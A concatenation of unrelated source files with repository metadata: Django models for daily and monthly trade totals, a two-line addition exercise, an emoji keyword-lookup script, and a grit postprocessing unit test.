from django.utils import timezone
from Account.models import Buyer, Seller, Company
class DayBuyer(models.Model):
"""
    Daily transaction amount total per buyer (买方日交易额总量表)
"""
date = models.DateField(verbose_name='任务日期', default=timezone.now)
buyer = models.ForeignKey(Buyer, on_delete=models.PROTECT, verbose_name='买方')
amount_total = models.IntegerField(verbose_name='日总交易金额(万元)', default=0)
class Meta:
verbose_name = '买方日交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.buyer, self.date, self.amount_total)
class DaySeller(models.Model):
"""
    Daily transaction amount total per seller (卖方日交易额总量表)
"""
date = models.DateField(verbose_name='任务日期', default=timezone.now)
seller = models.ForeignKey(Seller, on_delete=models.PROTECT, verbose_name='卖方')
amount_total = models.IntegerField(verbose_name='日总交易金额(万元)', default=0)
class Meta:
verbose_name = '卖方日交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.seller, self.date, self.amount_total)
class DayCompany(models.Model):
"""
    Daily transaction amount total per group subsidiary (集团子公司日交易额总量表)
"""
date = models.DateField(verbose_name='任务日期', default=timezone.now)
company = models.ForeignKey(Company, on_delete=models.PROTECT, verbose_name='集团子公司')
amount_total = models.IntegerField(verbose_name='日总交易金额(万元)', default=0)
class Meta:
verbose_name = '集团子公司日交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.company, self.date, self.amount_total)
class MouthBuyer(models.Model):
"""
    Monthly transaction amount total per buyer (买方月交易额总量表)
"""
date = models.CharField(max_length=8, verbose_name='月份')
buyer = models.ForeignKey(Buyer, on_delete=models.PROTECT, verbose_name='买方')
amount_total = models.IntegerField(verbose_name='月总交易金额(万元)', default=0)
class Meta:
verbose_name = '买方月交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.buyer, self.date, self.amount_total)
class MouthSeller(models.Model):
"""
    Monthly transaction amount total per seller (卖方月交易额总量表)
"""
date = models.CharField(max_length=8, verbose_name='月份')
seller = models.ForeignKey(Seller, on_delete=models.PROTECT, verbose_name='卖方')
amount_total = models.IntegerField(verbose_name='月总交易金额(万元)', default=0)
class Meta:
verbose_name = '卖方月交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.seller, self.date, self.amount_total)
class MouthCompany(models.Model):
"""
    Monthly transaction amount total per group subsidiary (集团子公司月交易额总量表)
"""
date = models.CharField(max_length=8, verbose_name='月份')
company = models.ForeignKey(Company, on_delete=models.PROTECT, verbose_name='集团子公司')
amount_total = models.IntegerField(verbose_name='月总交易金额(万元)', default=0)
class Meta:
verbose_name = '集团子公司月交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.company, self.date, self.amount_total)
|
[
"[email protected]"
] | |
e625e4dba04302b5a4595e8647919e5ef1a21495
|
58be9ab3da7170fa6eea7c12a6d59e4960db3c66
|
/alumnos/Luis Omar/Actividad 02/Actividad-4.py
|
ed06d854f235496b0664261a1e9e191effe05757
|
[] |
no_license
|
CodevEnsenada/actividades
|
08d39b9b53d8c10ad17204fa9ac5e313a940a4b3
|
862d6f983b7056957522d28686df1b0a323a9e6f
|
refs/heads/master
| 2022-04-09T03:47:32.373978 | 2020-03-16T20:17:14 | 2020-03-16T20:17:14 | 241,519,981 | 0 | 12 | null | 2020-03-16T20:17:15 | 2020-02-19T03:03:48 |
Python
|
UTF-8
|
Python
| false | false | 36 |
py
|
# Activity 4
a=18
b=2
suma=a+b
print(suma)
|
[
"[email protected]"
] | |
88602e1e0e2ef39da01887596a86e434b79e849e
|
028afaa205e46e0db61707a84860fa5e34bd61aa
|
/my_emoji.py
|
50ffaaed40c18a77aaf96e8211a5dc06a70dfe55
|
[] |
no_license
|
muriel27/mojo_python
|
d4f32142e9817621a319e3d4cbcc89d3a9771ddb
|
c5488d6d35992e932f91f5cae58a87515b0ee77e
|
refs/heads/master
| 2021-01-20T20:08:07.036918 | 2016-06-27T02:56:21 | 2016-06-27T02:56:21 | 61,265,888 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 23,119 |
py
|
#__author__ = 'mjwei'
from enum import Enum
import os
import operator
import random
class Category(Enum):
People = 'people'
Face ='face'
CatFace ='catFace'
MonkeyFace = 'monkeyFace'
Transport = 'transport'
Symbol = 'symbol'
Animal = 'animal'
Others = 'others'
Plant = 'plant'
Fruit = 'fruit'
Food = 'food'
Drink = 'drink'
Instruments = 'instruments'
Sport = 'sport'
Building = 'building'
Features = 'features'
Direction = 'direction'
Hand = 'hand'
class Emoji(Enum):
Grin = ('\U0001F601', Category.Face.name, ['happy','joy','grad'])
Tear = ('\U0001F602', Category.Face.name, ['happy','joy','grad'])
Smile = ('\U0001F603', Category.Face.name, ['happy','joy','grad','smiling'])
Sweat = ('\U0001F605', Category.Face.name, ['happy','joy','grad','smiling'])
XD = ('\U0001F606', Category.Face.name, ['happy','joy','grad','smiling'])
Wink = ('\U0001F609', Category.Face.name, ['happy','joy','grad','smiling'])
Savor = ('\U0001F60B', Category.Face.name, ['happy','joy','grad','smiling'])
Relieve = ('\U0001F60C', Category.Face.name, ['none'])
HeartShaped = ('\U0001F60D', Category.Face.name, ['love','happy','joy','grad','smiling'])
Smirk = ('\U0001F60F', Category.Face.name, ['none'])
Unamused = ('\U0001F612', Category.Face.name, ['none'])
ColdSweat = ('\U0001F613', Category.Face.name, ['none'])
Pensive = ('\U0001F614', Category.Face.name, ['none'])
Confound = ('\U0001F616', Category.Face.name, ['confuse','puzzle'])
Kiss = ('\U0001F618', Category.Face.name, ['none'])
TongueFace = ('\U0001F61C',Category.Face.name, ['wink','stuck-out'])
ClosedEyes = ('\U0001F61D', Category.Face.name, ['none'])
Disappoint = ('\U0001F61E', Category.Face.name, ['none'])
Angry = ('\U0001F620', Category.Face.name, ['none'])
Pout = ('\U0001F621', Category.Face.name, ['none'])
SadCry = ('\U0001F622', Category.Face.name, ['none'])
Worry = ('\U0001F623', Category.Face.name, ['worried','persevere','persevering'])
Triumph = ('\U0001F624', Category.Face.name, ['none'])
Relieved = ('\U0001F625', Category.Face.name, ['disappoint'])
Fear = ('\U0001F628', Category.Face.name, ['none'])
Weary = ('\U0001F629', Category.Face.name, ['none'])
Sleep = ('\U0001F62A', Category.Face.name, ['none'])
Tired = ('\U0001F62B', Category.Face.name, ['none'])
LoudCry = ('\U0001F62D', Category.Face.name, ['none'])
Scream = ('\U0001F631', Category.Face.name, ['fear','shock','scare'])
Astonished = ('\U0001F632', Category.Face.name, ['shock'])
Flushed = ('\U0001F633', Category.Face.name, ['blush'])
Dizzy = ('\U0001F635', Category.Face.name, ['none'])
MedicalMask = ('\U0001F637', Category.Face.name, ['ill','sick'])
GrinCat = ('\U0001F638', Category.CatFace.name, ['happy','joy','grad'])
TearCat = ('\U0001F639', Category.CatFace.name, ['happy','joy','grad'])
SmileCat = ('\U0001F63A', Category.CatFace.name, ['happy','joy','grad','smiling'])
HeartShapedCat = ('\U0001F63B', Category.CatFace.name, ['love','happy','joy','grad','smiling'])
WrySmileCat = ('\U0001F63C', Category.CatFace.name, ['none'])
KissCat = ('\U0001F63D', Category.CatFace.name, ['none'])
PoutCat = ('\U0001F63E', Category.CatFace.name, ['none'])
SadCryCat = ('\U0001F63F', Category.CatFace.name, ['none'])
NoGoodGesture = ('\U0001F645', Category.People.name, ['object','deny'])
OkGesture = ('\U0001F646', Category.People.name, ['agree','yes'])
Bowing = ('\U0001F647', Category.People.name, ['kneel'])
SeeNoEvilMonkey = ('\U0001F648', Category.MonkeyFace.name, ['none'])
HearNoEvilMonkey = ('\U0001F649', Category.MonkeyFace.name, ['none'])
SpeakNoEvilMonkey = ('\U0001F64A', Category.MonkeyFace.name, ['none'])
RaiseOneHand = ('\U0001F64B', Category.Face.name, ['raising'])
RaiseBothHand = ('\U0001F64C', Category.Face.name, ['raising'])
Frown = ('\U0001F64D', Category.Face.name, ['none'])
FoldedHands = ('\U0001F64F', Category.Face.name, ['none'])
Rocket = ('\U0001F680', Category.Transport.name, ['none'])
RailwayCar = ('\U0001F683', Category.Transport.name, ['none'])
HighSpeed = ('\U0001F684', Category.Transport.name, ['train'])
HighSpeedBullet = ('\U0001F685', Category.Transport.name, ['train'])
Metro = ('\U0001F687', Category.Transport.name, ['none'])
Station = ('\U0001F689', Category.Transport.name, ['none'])
Bus = ('\U0001F68C', Category.Transport.name, ['none'])
BusStop = ('\U0001F68F', Category.Transport.name, ['none'])
Ambulance = ('\U0001F691', Category.Transport.name, ['none'])
FireEngine = ('\U0001F692', Category.Transport.name, ['none'])
PoliceCar = ('\U0001F693', Category.Transport.name, ['none'])
Taxi = ('\U0001F695', Category.Transport.name, ['none'])
Automobile = ('\U0001F697', Category.Transport.name, ['car'])
RecreationalVehicle = ('\U0001F699', Category.Transport.name, ['none'])
DeliveryTruck = ('\U0001F69A', Category.Transport.name, ['none'])
Ship = ('\U0001F6A2', Category.Transport.name, ['none'])
Speedboat = ('\U0001F6A4', Category.Transport.name, ['none'])
TrafficLight = ('\U0001F6A5', Category.Transport.name, ['horizontal'])
ConstructionSign = ('\U0001F6A7', Category.Transport.name, ['none'])
RevolvingLight = ('\U0001F6A8', Category.Transport.name, ['none'])
TriangularFlag = ('\U0001F6A9', Category.Transport.name, ['on post'])
Door = ('\U0001F6AA', Category.Transport.name, ['none'])
NoEntry = ('\U0001F6AB', Category.Symbol.name, ['none'])
SmokingSymbol = ('\U0001F6AC', Category.Symbol.name, ['sign'])
NoSmokingSymbol = ('\U0001F6AD', Category.Symbol.name, ['sign'])
Bicycle = ('\U0001F6B2', Category.Transport.name, ['sign'])
Pedestrian = ('\U0001F6B6', Category.Transport.name, ['sign'])
MenSymbol = ('\U0001F6B9', Category.Symbol.name, ['sign'])
WomenSymbol = ('\U0001F6BA', Category.Symbol.name, ['sign'])
Restroom = ('\U0001F6BB', Category.Symbol.name, ['bathroom'])
BabySymbol = ('\U0001F6BC', Category.Symbol.name, ['sign'])
Toilet = ('\U0001F6BD', Category.Symbol.name, ['bathroom','restroom'])
WaterCloset = ('\U0001F6BE', Category.Symbol.name, ['wc'])
Bath = ('\U0001F6C0', Category.Symbol.name, ['sign'])
Rat = ('\U0001F400', Category.Animal.name, ['none'])
Mouse = ('\U0001F401', Category.Animal.name, ['none'])
Ox = ('\U0001F402', Category.Animal.name, ['none'])
WaterBuffalo = ('\U0001F403', Category.Animal.name, ['none'])
Cow = ('\U0001F404', Category.Animal.name, ['none'])
Tiger = ('\U0001F405', Category.Animal.name, ['none'])
Leopard = ('\U0001F406', Category.Animal.name, ['none'])
Rabbit = ('\U0001F407', Category.Animal.name, ['none'])
Cat = ('\U0001F408', Category.Animal.name, ['none'])
Dragon = ('\U0001F409', Category.Animal.name, ['none'])
Crocodile = ('\U0001F40A', Category.Animal.name, ['none'])
Whale = ('\U0001F40B', Category.Animal.name, ['none'])
Ram = ('\U0001F40F', Category.Animal.name, ['none'])
Goat = ('\U0001F410', Category.Animal.name, ['none'])
Rooster = ('\U0001F413', Category.Animal.name, ['none'])
Dog = ('\U0001F415', Category.Animal.name, ['none'])
Pig = ('\U0001F416', Category.Animal.name, ['none'])
Camel = ('\U0001F42A', Category.Animal.name, ['none'])
Watch = ('\U0000231A', Category.Others.name, ['none'])
Hourglass = ('\U0000231B', Category.Others.name, ['none'])
AlarmClock = ('\U000023F0', Category.Others.name, ['none'])
    Cloud = ('\U00002601', Category.Others.name, ['none'])  # U+2601 is CLOUD
    Sun = ('\U00002600', Category.Others.name, ['none'])  # U+2600 is BLACK SUN WITH RAYS
Telephone = ('\U0000260E', Category.Others.name, ['none'])
Umbrella = ('\U00002614', Category.Others.name, ['none'])
Cafe = ('\U00002615', Category.Others.name, ['coffee','beverage','hot'])
WarningSign = ('\U000026A0', Category.Symbol.name, ['notice'])
HighVoltageSign = ('\U000026A1', Category.Symbol.name, ['lightning'])
Soccer = ('\U000026BD', Category.Others.name, ['football'])
Snowman = ('\U000026C4', Category.Others.name, ['none'])
Church = ('\U000026EA', Category.Others.name, ['none'])
Sailboat = ('\U000026F5', Category.Others.name, ['none'])
FuelPump = ('\U000026FD', Category.Others.name, ['none'])
Star = ('\U00002B50', Category.Others.name, ['none'])
Moon = ('\U0001F319', Category.Others.name, ['none'])
Seed = ('\U0001F331', Category.Plant.name, ['none'])
Palm = ('\U0001F334', Category.Others.name, ['tree'])
Cactus = ('\U0001F335', Category.Others.name, ['none'])
Tulip = ('\U0001F337', Category.Others.name, ['none'])
CherryBlossom = ('\U0001F338', Category.Others.name, ['none'])
Rose = ('\U0001F339', Category.Others.name, ['none'])
Hibiscus = ('\U0001F33A', Category.Others.name, ['none'])
Sunflower = ('\U0001F33B', Category.Others.name, ['none'])
Blossom = ('\U0001F33C', Category.Others.name, ['none'])
Maize = ('\U0001F33D', Category.Others.name, ['corn'])
Rice = ('\U0001F33E', Category.Others.name, ['none'])
Herb = ('\U0001F33F', Category.Others.name, ['none'])
FourLeafClover = ('\U0001F340', Category.Others.name, ['none'])
Maple = ('\U0001F341', Category.Others.name, ['leaf'])
FallenLeaf = ('\U0001F342', Category.Others.name, ['none'])
Mushroom = ('\U0001F344', Category.Others.name, ['none'])
Tomato = ('\U0001F345', Category.Others.name, ['none'])
Aubergine = ('\U0001F346', Category.Others.name, ['none'])
Grapes = ('\U0001F347', Category.Fruit.name, ['none'])
Melon = ('\U0001F348', Category.Fruit.name, ['none'])
Watermelon = ('\U0001F349', Category.Fruit.name, ['none'])
Tangerine = ('\U0001F34A', Category.Fruit.name, ['none'])
Banana = ('\U0001F34C', Category.Fruit.name, ['none'])
Pineapple = ('\U0001F34D', Category.Fruit.name, ['none'])
RedApple = ('\U0001F34E', Category.Fruit.name, ['none'])
GreenApple = ('\U0001F34F', Category.Fruit.name, ['none'])
Peach = ('\U0001F351', Category.Fruit.name, ['none'])
Cherries = ('\U0001F352', Category.Fruit.name, ['none'])
Strawberry = ('\U0001F353', Category.Fruit.name, ['none'])
Hamburger = ('\U0001F354', Category.Food.name, ['none'])
Pizza = ('\U0001F355', Category.Food.name, ['none'])
Bone = ('\U0001F356', Category.Food.name, ['meat'])
PoultryLeg = ('\U0001F357', Category.Food.name, ['none'])
RiceCracker = ('\U0001F358', Category.Food.name, ['none'])
RiceBall = ('\U0001F359', Category.Food.name, ['none'])
CookedRice = ('\U0001F35A', Category.Food.name, ['none'])
CurryRice = ('\U0001F35B', Category.Food.name, ['none'])
SteamingBowl = ('\U0001F35C', Category.Food.name, ['none'])
Spaghetti = ('\U0001F35D', Category.Food.name, ['none'])
Bread = ('\U0001F35E', Category.Food.name, ['none'])
FrenchFries = ('\U0001F35F', Category.Food.name, ['none'])
    SweetPotato = ('\U0001F360', Category.Food.name, ['none'])  # U+1F360; the original '\U0001F35E' duplicated Bread, making this an enum alias
Dango = ('\U0001F361', Category.Food.name, ['none'])
Oden = ('\U0001F362', Category.Food.name, ['none'])
Sushi = ('\U0001F363', Category.Food.name, ['none'])
FriedShrimp = ('\U0001F364', Category.Food.name, ['none'])
FishCake = ('\U0001F365', Category.Food.name, ['none'])
IceCream = ('\U0001F366', Category.Food.name, ['none'])
ShavedIce = ('\U0001F367', Category.Food.name, ['none'])
Doughnut = ('\U0001F369', Category.Food.name, ['none'])
Cookie = ('\U0001F36A', Category.Food.name, ['none'])
Chocolate = ('\U0001F36B', Category.Food.name, ['none'])
Candy = ('\U0001F36C', Category.Food.name, ['none'])
Lollipop = ('\U0001F36D', Category.Food.name, ['none'])
Custard = ('\U0001F36E', Category.Food.name, ['none'])
Honey = ('\U0001F36F', Category.Food.name, ['none'])
Shortcake = ('\U0001F370', Category.Food.name, ['cake'])
Bento = ('\U0001F371', Category.Food.name, ['box'])
Pot = ('\U0001F372', Category.Food.name, ['none'])
Cook = ('\U0001F373', Category.Food.name, ['none'])
ForkKnife = ('\U0001F374', Category.Food.name, ['none'])
Wine = ('\U0001F377', Category.Drink.name, ['none'])
Cocktail = ('\U0001F378', Category.Drink.name, ['none'])
Tropical = ('\U0001F379', Category.Drink.name, ['none'])
Beer = ('\U0001F37A', Category.Drink.name, ['none'])
Ribbon = ('\U0001F380', Category.Others.name, ['none'])
Present = ('\U0001F381', Category.Others.name, ['none'])
JackOLantern = ('\U0001F383', Category.Others.name, ['none'])
ChristmasTree = ('\U0001F384', Category.Others.name, ['none'])
FatherChristmas = ('\U0001F385', Category.Others.name, ['none'])
Fireworks = ('\U0001F386', Category.Others.name, ['none'])
Balloon = ('\U0001F388', Category.Others.name, ['none'])
WindChime = ('\U0001F390', Category.Others.name, ['none'])
SchoolSatchel = ('\U0001F392', Category.Others.name, ['none'])
GraduationCap = ('\U0001F393', Category.Others.name, ['none'])
Microphone = ('\U0001F3A4', Category.Others.name, ['none'])
Camera = ('\U0001F3A5', Category.Others.name, ['none'])
Palette = ('\U0001F3A8', Category.Others.name, ['none'])
Hat = ('\U0001F3A9', Category.Others.name, ['none'])
Circus = ('\U0001F3AA', Category.Others.name, ['tent'])
Ticket = ('\U0001F3AB', Category.Others.name, ['none'])
ClapperBoard = ('\U0001F3AC', Category.Others.name, ['none'])
VideoGame = ('\U0001F3AE', Category.Others.name, ['none'])
SlotMachine = ('\U0001F3B0', Category.Others.name, ['none'])
GameDie = ('\U0001F3B2', Category.Others.name, ['none'])
Bowling = ('\U0001F3B3', Category.Others.name, ['none'])
MusicalNote = ('\U0001F3B5', Category.Instruments.name, ['none'])
Saxophone = ('\U0001F3B7', Category.Instruments.name, ['none'])
Guitar = ('\U0001F3B8', Category.Instruments.name, ['none'])
Keyboard = ('\U0001F3B9', Category.Instruments.name, ['none'])
Trumpet = ('\U0001F3BA', Category.Instruments.name, ['none'])
Violin = ('\U0001F3BB', Category.Instruments.name, ['none'])
MusicalScore = ('\U0001F3BC', Category.Instruments.name, ['none'])
Tennis = ('\U0001F3BE', Category.Sport.name, ['none'])
SkiBoot = ('\U0001F3BF', Category.Sport.name, ['none'])
Basketball = ('\U0001F3C0', Category.Sport.name, ['hoop'])
ChequeredFlag = ('\U0001F3C1', Category.Sport.name, ['none'])
Snowboarder = ('\U0001F3C2', Category.Sport.name, ['none'])
Runner = ('\U0001F3C3', Category.Sport.name, ['none'])
Surfer = ('\U0001F3C4', Category.Sport.name, ['none'])
Trophy = ('\U0001F3C6', Category.Sport.name, ['none'])
AmericanFootball = ('\U0001F3C8', Category.Sport.name, ['none'])
Swimmer = ('\U0001F3CA', Category.Sport.name, ['none'])
House = ('\U0001F3E1', Category.Building.name, ['none'])
Office = ('\U0001F3E2', Category.Building.name, ['none'])
Hospital = ('\U0001F3E5', Category.Building.name, ['none'])
Bank = ('\U0001F3E6', Category.Building.name, ['none'])
ATM = ('\U0001F3E7', Category.Building.name, ['none'])
Hotel = ('\U0001F3E8', Category.Building.name, ['none'])
ConvenienceStore = ('\U0001F3EA', Category.Building.name, ['none'])
School = ('\U0001F3EB', Category.Building.name, ['none'])
Department = ('\U0001F3EC', Category.Building.name, ['none'])
Factory = ('\U0001F3ED', Category.Building.name, ['none'])
Snail = ('\U0001F40C', Category.Animal.name, ['none'])
Snake = ('\U0001F40D', Category.Animal.name, ['none'])
Horse = ('\U0001F40E', Category.Animal.name, ['none'])
Sheep = ('\U0001F411', Category.Animal.name, ['none'])
Monkey = ('\U0001F412', Category.Animal.name, ['none'])
Chicken = ('\U0001F414', Category.Animal.name, ['none'])
Boar = ('\U0001F417', Category.Animal.name, ['none'])
Elephant = ('\U0001F418', Category.Animal.name, ['none'])
Octopus = ('\U0001F419', Category.Animal.name, ['none'])
SpiralShell = ('\U0001F41A', Category.Animal.name, ['none'])
Bug = ('\U0001F41B', Category.Animal.name, ['none'])
Ant = ('\U0001F41C', Category.Animal.name, ['none'])
Honeybee = ('\U0001F41D', Category.Animal.name, ['none'])
LadyBeetle = ('\U0001F41E', Category.Animal.name, ['none'])
Fish = ('\U0001F41F', Category.Animal.name, ['none'])
TropicalFish = ('\U0001F420', Category.Animal.name, ['none'])
Blowfish = ('\U0001F421', Category.Animal.name, ['none'])
Turtle = ('\U0001F422', Category.Animal.name, ['none'])
HatchingChick = ('\U0001F423', Category.Animal.name, ['none'])
BabyChick = ('\U0001F424', Category.Animal.name, ['none'])
Bird = ('\U0001F426', Category.Animal.name, ['none'])
Penguin = ('\U0001F427', Category.Animal.name, ['none'])
Koala = ('\U0001F428', Category.Animal.name, ['none'])
Poodle = ('\U0001F429', Category.Animal.name, ['none'])
Dolphin = ('\U0001F42C', Category.Animal.name, ['none'])
MouseFace = ('\U0001F42D', Category.Animal.name, ['none'])
CowFace = ('\U0001F42E', Category.Animal.name, ['none'])
TigerFace = ('\U0001F42F', Category.Animal.name, ['none'])
RabbitFace = ('\U0001F430', Category.Animal.name, ['none'])
CatFace = ('\U0001F431', Category.Animal.name, ['none'])
DragonFace = ('\U0001F432', Category.Animal.name, ['none'])
SpoutingWhale = ('\U0001F433', Category.Animal.name, ['none'])
HorseFace = ('\U0001F434', Category.Animal.name, ['none'])
MonkeyFace = ('\U0001F435', Category.Animal.name, ['none'])
DogFace = ('\U0001F436', Category.Animal.name, ['none'])
PigFace = ('\U0001F437', Category.Animal.name, ['none'])
FrogFace = ('\U0001F438', Category.Animal.name, ['none'])
HamsterFace = ('\U0001F439', Category.Animal.name, ['none'])
WolfFace = ('\U0001F43A', Category.Animal.name, ['none'])
BearFace = ('\U0001F43B', Category.Animal.name, ['none'])
PandaFace = ('\U0001F43C', Category.Animal.name, ['none'])
PigNose = ('\U0001F43D', Category.Animal.name, ['none'])
PawPrints = ('\U0001F43E', Category.Animal.name, ['none'])
Eyes = ('\U0001F440', Category.Features.name, ['none'])
Ear = ('\U0001F442', Category.Features.name, ['none'])
Nose = ('\U0001F443', Category.Features.name, ['none'])
Mouth = ('\U0001F444', Category.Features.name, ['none'])
Tongue = ('\U0001F445', Category.Features.name, ['none'])
Up = ('\U0001F446', Category.Direction.name, ['none'])
Down = ('\U0001F447', Category.Direction.name, ['none'])
Left = ('\U0001F448', Category.Direction.name, ['none'])
Right = ('\U0001F449', Category.Direction.name, ['none'])
FistedHand = ('\U0001F44A', Category.Hand.name, ['none'])
WavingHand = ('\U0001F44B', Category.Hand.name, ['none'])
OK = ('\U0001F44C', Category.Hand.name, ['none'])
ThumbsUp = ('\U0001F44D', Category.Hand.name, ['none'])
ThumbsDown = ('\U0001F44E', Category.Hand.name, ['none'])
ClappingHands = ('\U0001F44F', Category.Hand.name, ['none'])
OpenHands = ('\U0001F450', Category.Hand.name, ['none'])
Crown = ('\U0001F451', Category.Others.name, ['none'])
Eyeglasses = ('\U0001F453', Category.Others.name, ['none'])
Necktie = ('\U0001F454', Category.Others.name, ['none'])
Tshirt = ('\U0001F455', Category.Others.name, ['none'])
Jeans = ('\U0001F456', Category.Others.name, ['none'])
Dress = ('\U0001F457', Category.Others.name, ['none'])
Kimono = ('\U0001F458', Category.Others.name, ['none'])
Bikini = ('\U0001F459', Category.Others.name, ['none'])
WomansClothes = ('\U0001F45A', Category.Others.name, ['none'])
Purse = ('\U0001F45B', Category.Others.name, ['none'])
Handbag = ('\U0001F45C', Category.Others.name, ['none'])
Pouch = ('\U0001F45D', Category.Others.name, ['none'])
MansShoe = ('\U0001F45E', Category.Others.name, ['none'])
AthleticShoe = ('\U0001F45F', Category.Others.name, ['none'])
HighHeeledShoe = ('\U0001F460', Category.Others.name, ['none'])
SandalShoe = ('\U0001F461', Category.Others.name, ['none'])
BootsShoe = ('\U0001F462', Category.Others.name, ['none'])
Footprints = ('\U0001F463', Category.Others.name, ['none'])
Boy = ('\U0001F466', Category.People.name, ['none'])
Girl = ('\U0001F467', Category.People.name, ['none'])
Man = ('\U0001F468', Category.People.name, ['none'])
Woman = ('\U0001F469', Category.People.name, ['none'])
Family = ('\U0001F46A', Category.People.name, ['none'])
Couple = ('\U0001F46B', Category.People.name, ['none'])
Police = ('\U0001F46E', Category.People.name, ['officer'])
Bride = ('\U0001F470', Category.People.name, ['none'])
Baby = ('\U0001F476', Category.People.name, ['infant'])
Princess = ('\U0001F478', Category.People.name, ['none'])
Ghost = ('\U0001F47B', Category.Others.name, ['none'])
Skull = ('\U0001F480', Category.Others.name, ['none'])
Guardsman = ('\U0001F482', Category.People.name, ['none'])
Dancer = ('\U0001F483', Category.People.name, ['none'])
Lipstick = ('\U0001F484', Category.Others.name, ['none'])
Syringe = ('\U0001F489', Category.Others.name, ['none'])
Pill = ('\U0001F48A', Category.Others.name, ['none'])
Ring = ('\U0001F48D', Category.Others.name, ['none'])
Gem = ('\U0001F48E', Category.Others.name, ['none'])
BrokenHeart = ('\U0001F494', Category.Others.name, ['none'])
Heart = ('\U0001F49C', Category.Others.name, ['none'])
Bulb = ('\U0001F4A1', Category.Others.name, ['light'])
Anger = ('\U0001F4A2', Category.Others.name, ['none'])
Bomb = ('\U0001F4A3', Category.Others.name, ['none'])
Sleeping = ('\U0001F4A4', Category.Others.name, ['none'])
PileOfPoo = ('\U0001F4A9', Category.Others.name, ['none'])
Money = ('\U0001F4B0', Category.Others.name, ['none'])
CreditCard = ('\U0001F4B3', Category.Others.name, ['none'])
Computer = ('\U0001F4BB', Category.Others.name, ['none'])
Disk = ('\U0001F4BE', Category.Others.name, ['none'])
Calendar = ('\U0001F4C5', Category.Others.name, ['none'])
Clipboard = ('\U0001F4CB', Category.Others.name, ['none'])
Pushpin = ('\U0001F4CC', Category.Others.name, ['none'])
Paperclip = ('\U0001F4CE', Category.Others.name, ['none'])
Notebook = ('\U0001F4D3', Category.Others.name, ['none'])
Memo = ('\U0001F4DD', Category.Others.name, ['none'])
Postbox = ('\U0001F4EE', Category.Others.name, ['none'])
Newspaper = ('\U0001F4F0', Category.Others.name, ['none'])
Mobile = ('\U0001F4F1', Category.Others.name, ['phone'])
Television = ('\U0001F4FA', Category.Others.name, ['none'])
Radio = ('\U0001F4FB', Category.Others.name, ['none'])
Plug = ('\U0001F50C', Category.Others.name, ['none'])
Key = ('\U0001F511', Category.Others.name, ['none'])
Lock = ('\U0001F512', Category.Others.name, ['none'])
Bell = ('\U0001F514', Category.Others.name, ['none'])
Button = ('\U0001F518', Category.Others.name, ['none'])
Wrench = ('\U0001F527', Category.Others.name, ['none'])
Hammer = ('\U0001F528', Category.Others.name, ['none'])
Pistol = ('\U0001F52B', Category.Others.name, ['gun'])
# translate the entered word into an Emoji
def to_emoji(enter):
flag = False
for emoji in Emoji:
        # find the corresponding word in Emoji.name
if(enter.find(emoji.name.lower()) >= 0 ):
flag = True
print((emoji.value)[0])
break
        # find the corresponding word in Emoji.value[2], the extra descriptions
emotion_tup = emoji.value
for description in emotion_tup[2]:
if(enter.find(description) >= 0 or description.find(enter) >=0):
flag = True
print((emoji.value)[0])
break
if flag:
break
    if not flag:
        # randomly select from the emoji list of the matching category
        emoji_list = searchCategory(enter)
        if len(emoji_list) > 0:
            flag = True
            print(random.choice(emoji_list))
    # default emoji if no corresponding emoji can be found
    if not flag:
        print('\U0001F631')
# find the corresponding word in the category name
def searchCategory(enter):
emoji_list = []
for emoji in Emoji:
category=(emoji.value)[1]
if(category.lower().find(enter) >=0):
emoji_list.append((emoji.value)[0])
return emoji_list
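# Example session (category matches pick a random member, so output may vary):
#   Please key in here :pizza  -> prints Emoji.Pizza (matched by name)
#   Please key in here :fruit  -> prints a random member of Category.Fruit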
while True:
enter = input("Please key in here :")
if enter=='':
break
to_emoji(enter.lower())
|
[
"[email protected]"
] | |
624253db8803ba4e60460ddc4c11d392b0bac60d
|
297497957c531d81ba286bc91253fbbb78b4d8be
|
/third_party/libwebrtc/tools/grit/grit/tool/postprocess_unittest.py
|
21ca5e2f774610e4a7efa36f398ec1fb87b4cddc
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
marco-c/gecko-dev-comments-removed
|
7a9dd34045b07e6b22f0c636c0a836b9e639f9d3
|
61942784fb157763e65608e5a29b3729b0aa66fa
|
refs/heads/master
| 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 |
NOASSERTION
| 2019-09-29T01:27:49 | 2019-09-27T10:44:24 |
C++
|
UTF-8
|
Python
| false | false | 1,705 |
py
|
'''Unit test that checks postprocessing of files.
Tests postprocessing by having the postprocessor
modify the grd data tree, changing the message name attributes.
'''
from __future__ import print_function
import os
import re
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import unittest
import grit.tool.postprocess_interface
from grit.tool import rc2grd
class PostProcessingUnittest(unittest.TestCase):
def testPostProcessing(self):
rctext = '''STRINGTABLE
BEGIN
DUMMY_STRING_1 "String 1"
// Some random description
DUMMY_STRING_2 "This text was added during preprocessing"
END
'''
tool = rc2grd.Rc2Grd()
class DummyOpts(object):
verbose = False
extra_verbose = False
tool.o = DummyOpts()
tool.post_process = 'grit.tool.postprocess_unittest.DummyPostProcessor'
result = tool.Process(rctext, '.\resource.rc')
self.failUnless(
result.children[2].children[2].children[0].attrs['name'] == 'SMART_STRING_1')
self.failUnless(
result.children[2].children[2].children[1].attrs['name'] == 'SMART_STRING_2')
class DummyPostProcessor(grit.tool.postprocess_interface.PostProcessor):
'''
Post processing replaces all message name attributes containing "DUMMY" to
"SMART".
'''
def Process(self, rctext, rcpath, grdnode):
smarter = re.compile(r'(DUMMY)(.*)')
messages = grdnode.children[2].children[2]
for node in messages.children:
name_attr = node.attrs['name']
m = smarter.search(name_attr)
if m:
node.attrs['name'] = 'SMART' + m.group(2)
return grdnode
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
7dc45d66e98d4d7f6520c961a275e8f2cca368d4
|
